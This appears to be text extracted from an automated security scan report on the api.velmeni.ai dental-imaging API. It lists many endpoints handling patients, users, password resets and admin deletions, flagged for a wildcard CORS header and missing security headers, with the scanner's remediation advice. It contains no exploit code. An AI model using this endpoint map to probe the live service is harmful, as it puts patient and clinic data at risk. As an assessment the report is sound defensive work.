The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/dental_robot/create_patients

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/dental_robot/create_users

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/migration/migrate

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/add

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/practice/add

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/organizations/save_features

Method POST

Attack

Other

Info

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL https://api.velmeni.ai/api/patient/create

Method POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/patient/get_s3_auth_urls?

source system=VELMENI FOR DENTIST

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/patient/list_by_appointment/1173

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/patient/scan/add?source_system=VELMENI_FOR_DENTIST

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/patient/scan/analyze/2202

URL

Method

POST

Attack Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/patient/scan/skip
Method	POST
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/patient/scan/update_slot
Method	POST
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/role/create_role
Method	POST
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/sikka/add_image
Method	POST
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/sikka/appointment
Method	POST
Attack	
Evidence	Access-Control-Allow-Origin: *

Other Info

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method

POST

Attack

Evidence

Access-Control-Allow-Origin: *

Other Info

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/sikka/import/7?source system=VELMENI FOR DENTIST

Method

POST

Attack

Info

Evidence Access-Control-Allow-Origin: *

Other

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/sikka/import_practice_data/3? practice ids=3&source system=VELMENI FOR DENTIST

Method **POST**

Attack

Evidence Access-Control-Allow-Origin: *

Other Info

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/sikka/import procedure category?

source system=VELMENI FOR DENTIST

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/add

Method

POST

Attack

Evidence Access-Control-Allow-Origin: * Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/change_password

Method

POST

Attack

Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/complete_forgot_password

Method Attack

Other

Info

URL

Evidence

Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/user/enable_user

Method

POST

POST

Attack

Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/initiate_forgot_password

Method

POST

Attack

Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/send_invite

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser

Other Info

implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/send reminder

Method

POST

POST

Attack

Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/update_preferred_numbering_system

Method

Attack Evidence

Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/user/validate_email

Method

POST

Attack

Other

Info

URL

Evidence

Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.

https://api.velmeni.ai/api/velmeni_bridge/add_image

Method

POST

Attack

Evidence Access-Control-Allow-Origin: *

Other Info The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some

other form of security, such as IP address white-listing.

URL

https://api.velmeni.ai/api/organizations/practice/update/1659

Method

PUT

Attack

Evidence Access-Control-Allow-Origin: *

The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated

Other Info

APIs, however. This reduces the risk somewhat. This misconfiguration could

	be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/organizations/update/27
Method	PUT
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/patient/update
Method	PUT
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URL	https://api.velmeni.ai/api/user/update/1
Method	PUT
Attack	
Evidence	Access-Control-Allow-Origin: *
Other Info	The CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
Instances	75
Solution	Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance). Configure the "Access-Control-Allow-Origin" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.
Reference	https://vulncat.fortify.com/en/detail?id=desc.config.dotnet. html5_overly_permissive_cors_policy
CWE Id	264
WASC Id	14
Plugin Id	10098
Low	Strict-Transport-Security Header Not Set
Description	HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.
URL	https://api.velmeni.ai/api/organizations/delete/26? source system=VELMENI FOR DENTIST
Method	DELETE

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/organizations/practice/delete/1659?

source system=VELMENI FOR DENTIST

Method DELETE

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/patient/delete/145139?source_system=VELMENI_FOR_DENTIST

Method DELETE

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/user/delete/1919?source_system=VELMENI_FOR_DENTIST

Method DELETE

Attack Evidence

Other Info

URL https://api.velmeni.ai/api/analytics/compare_json/22?

source system=VELMENI FOR DENTIST

Method GET

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/analytics/doctor stats?

organization id=7&source system=VELMENI FOR DENTIST

Method GET

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/analytics/generate_visit_report?

visit id=115535&report type=pdf&source system=VELMENI FOR DENTIST

Method GET

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/analytics/tooth_analysis/1

Method GET

Attack Evidence Other Info URL https://api.velmeni.ai/api/auth/list scopes?source system=VELMENI FOR DENTIST **GET** Method Attack Evidence Other Info **URL** https://api.velmeni.ai/api/dental_robot/get_patient/D12345_1_100 Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/hierarchy?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info https://api.velmeni.ai/api/organizations/53/practice? **URL** source system=VELMENI FOR DENTIST Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/organizations/get/26?source_system=VELMENI_FOR_DENTIST **GET** Method Attack Evidence Other Info URL https://api.velmeni.ai/api/organizations/get_organization_logo_urls/1 Method **GET** Attack Evidence Other Info https://api.velmeni.ai/api/organizations/get_practice_logo_urls/1453? URL source system=VELMENI FOR DENTIST Method **GET** Attack Evidence

Other Info

URL https://api.velmeni.ai/api/organizations/list?source_system=VELMENI_FOR_DENTIST

Method GET

Attack
Evidence
Other
Info

URL

https://api.velmeni.ai/api/organizations/practice/get/1273?

source system=VELMENI FOR DENTIST

Method GET

Attack Evidence Other

Info

URL https://api.velmeni.ai/api/patient/56526/history/?source_system=VELMENI_FOR_DENTIST

Method GET

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/patient/get/145139?source_system=VELMENI_FOR_DENTIST

Method GET

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/patient/list/1656?source_system=VELMENI_FOR_DENTIST

Method GET

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/patient/list_image_by_patient/137120?

source system=VELMENI FOR DENTIST

Method GET

Attack Evidence Other Info

URL https://api.velmeni.ai/api/patient/list_image_by_visit_id/107073?

source system=VELMENI FOR DENTIST

Method GET

Attack Evidence Other Info URL https://api.velmeni.ai/api/patient/list_images/3 **GET** Method Attack Evidence Other Info https://api.velmeni.ai/api/patient/list_patients/1170? **URL** source system=VELMENI FOR DENTIST Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/patient/pathology/list?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/patient/scan/12931?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info https://api.velmeni.ai/api/patient/search/399? **URL** name=pu&source system=VELMENI FOR DENTIST Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/user/get/1919?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info https://api.velmeni.ai/api/user/get_preferred_numbering_system? **URL** source system=VELMENI FOR DENTIST Method **GET** Attack Evidence

Other Info URL https://api.velmeni.ai/api/user/list/1170?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/user/list?source_system=VELMENI_FOR_DENTIST Method **GET** Attack Evidence Other Info https://api.velmeni.ai/api/user/list_roles?source_system=VELMENI_FOR_DENTIST URL Method **GET** Attack Evidence Other Info URL https://api.velmeni.ai/api/admin/delete_organization/27 **POST** Method Attack Evidence Other Info URL https://api.velmeni.ai/api/admin/delete_practice/21 Method **POST** Attack Evidence Other Info URL https://api.velmeni.ai/api/analytics/add medical note POST Method Attack Evidence

Other Info

URL https://api.velmeni.ai/api/analytics/get comparison report

POST Method

Attack Evidence

Other Info URL https://api.velmeni.ai/api/analytics/list_analysis_job/3 Method **POST** Attack Evidence Other Info URL https://api.velmeni.ai/api/analytics/logged in users **POST** Method Attack Evidence Other Info URL https://api.velmeni.ai/api/auth **POST** Method Attack Evidence Other Info URL https://api.velmeni.ai/api/dental_robot/add_image Method POST Attack Evidence Other Info **URL** https://api.velmeni.ai/api/dental robot/create patients Method **POST** Attack Evidence Other Info **URL** https://api.velmeni.ai/api/dental_robot/create_users Method **POST** Attack Evidence Other Info URL https://api.velmeni.ai/api/migration/migrate Method **POST** Attack Evidence Other Info

URL	https://api.velmeni.ai/api/organizations/add
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/organizations/practice/add
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/organizations/save_features
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/create
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/get_s3_auth_urls? source_system=VELMENI_FOR_DENTIST
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/list_by_appointment/1173
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/scan/add?source_system=VELMENI_FOR_DENTIST
Method	POST
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/scan/analyze/2202

Method POST
Attack

Evidence Other Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/patient/scan/skip

Method POST

Evidence Other Info

Attack

URL https://api.velmeni.ai/api/patient/scan/update_slot

Method POST

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/role/create_role

Method POST

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/sikka/add_image

Method POST

Evidence Other Info

Attack

URL https://api.velmeni.ai/api/sikka/appointment

Method POST

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/sikka/create-patient-webhook

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/import/7?source_system=VELMENI_FOR_DENTIST

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/import_practice_data/3?

practice ids=3&source system=VELMENI FOR DENTIST

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/sikka/import_procedure_category?

source system=VELMENI FOR DENTIST

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/user/add

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/user/change-password

Method POST

Attack

Evidence

Other Info

URL https://api.velmeni.ai/api/user/complete_forgot_password

Method POST

Attack
Evidence
Other
Info

URL https://api.velmeni.ai/api/user/enable_user

Method POST

Attack

Evidence

Other Info URL https://api.velmeni.ai/api/user/initiate_forgot_password Method POST Attack Evidence Other Info URL https://api.velmeni.ai/api/user/send_invite Method POST Attack Evidence Other Info URL https://api.velmeni.ai/api/user/send_reminder Method **POST** Attack Evidence Other Info URL https://api.velmeni.ai/api/user/update_preferred_numbering_system **POST** Method Attack Evidence Other Info URL https://api.velmeni.ai/api/user/validate_email Method POST Attack Evidence Other Info **URL** https://api.velmeni.ai/api/velmeni bridge/add image Method POST Attack Evidence Other Info URL https://api.velmeni.ai/api/organizations/practice/update/1659 PUT Method Attack Evidence Other

URL	https://api.velmeni.ai/api/organizations/update/27
Method	PUT
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/patient/update
Method	PUT
Attack	
Evidence	
Other Info	
URL	https://api.velmeni.ai/api/user/update/1
Method	PUT
Attack	
Evidence	
Other Info	
Instances	75
Solution	Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.
Reference CWE Id WASC Id	https://cheatsheetseries.owasp.org/cheatsheets /HTTP_Strict_Transport_Security_Cheat_Sheet.html https://owasp.org/www-community/Security_Headers http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security http://caniuse.com/stricttransportsecurity http://tools.ietf.org/html/rfc6797
	15
Plugin Id	<u>10035</u>
Low	X-Content-Type-Options Header Missing
Description	The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.
URL	https://api.velmeni.ai/api/dental_robot/get_patient/D12345_1_100
Method	GET
Attack	
Evidence	
Other Info	This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.
URL	https://api.velmeni.ai/api/analytics/get_comparison_report
Method	POST

Attack

Evidence

Other Info This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or

server error responses.

URL https://api.velmeni.ai/api/auth

Method POST

Attack

Evidence

Other Info This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack

Evidence

Other Info This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.

https://api.velmeni.ai/api/dental_robot/create_patients

Method POST

Attack

URL

Evidence

Other Info This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.

URL https://api.velmeni.ai/api/dental_robot/create_users

Method POST

Attack

Evidence

Other Info This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.

URL https://api.velmeni.ai/api/sikka/add_image

Method POST

Attack

Evidence

Other Info

URL

This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.

https://api.velmeni.ai/api/sikka/create_patient_webhook

Method POST

Attack

Evidence		
Other Info	This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.	
URL	https://api.velmeni.ai/api/user/complete_forgot_password	
Method	POST	
Attack		
Evidence		
Other Info	This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.	
URL	https://api.velmeni.ai/api/user/initiate_forgot_password	
Method	POST	
Attack		
Evidence		
Other Info	This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.	
URL	https://api.velmeni_ai/api/velmeni_bridge/add_image	
Method	POST	
Attack		
Evidence		
Other Info	This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type. At "High" threshold this scan rule will not alert on client or server error responses.	
Instances		
	11	
Solution	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing.	
Solution Reference	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx	
Reference CWE Id	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers	
Reference	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx	
Reference CWE Id	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers 693	
Reference CWE Id WASC Id Plugin Id	Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages. If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application /web server to not perform MIME-sniffing. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx https://owasp.org/www-community/Security_Headers 693 15 10021	
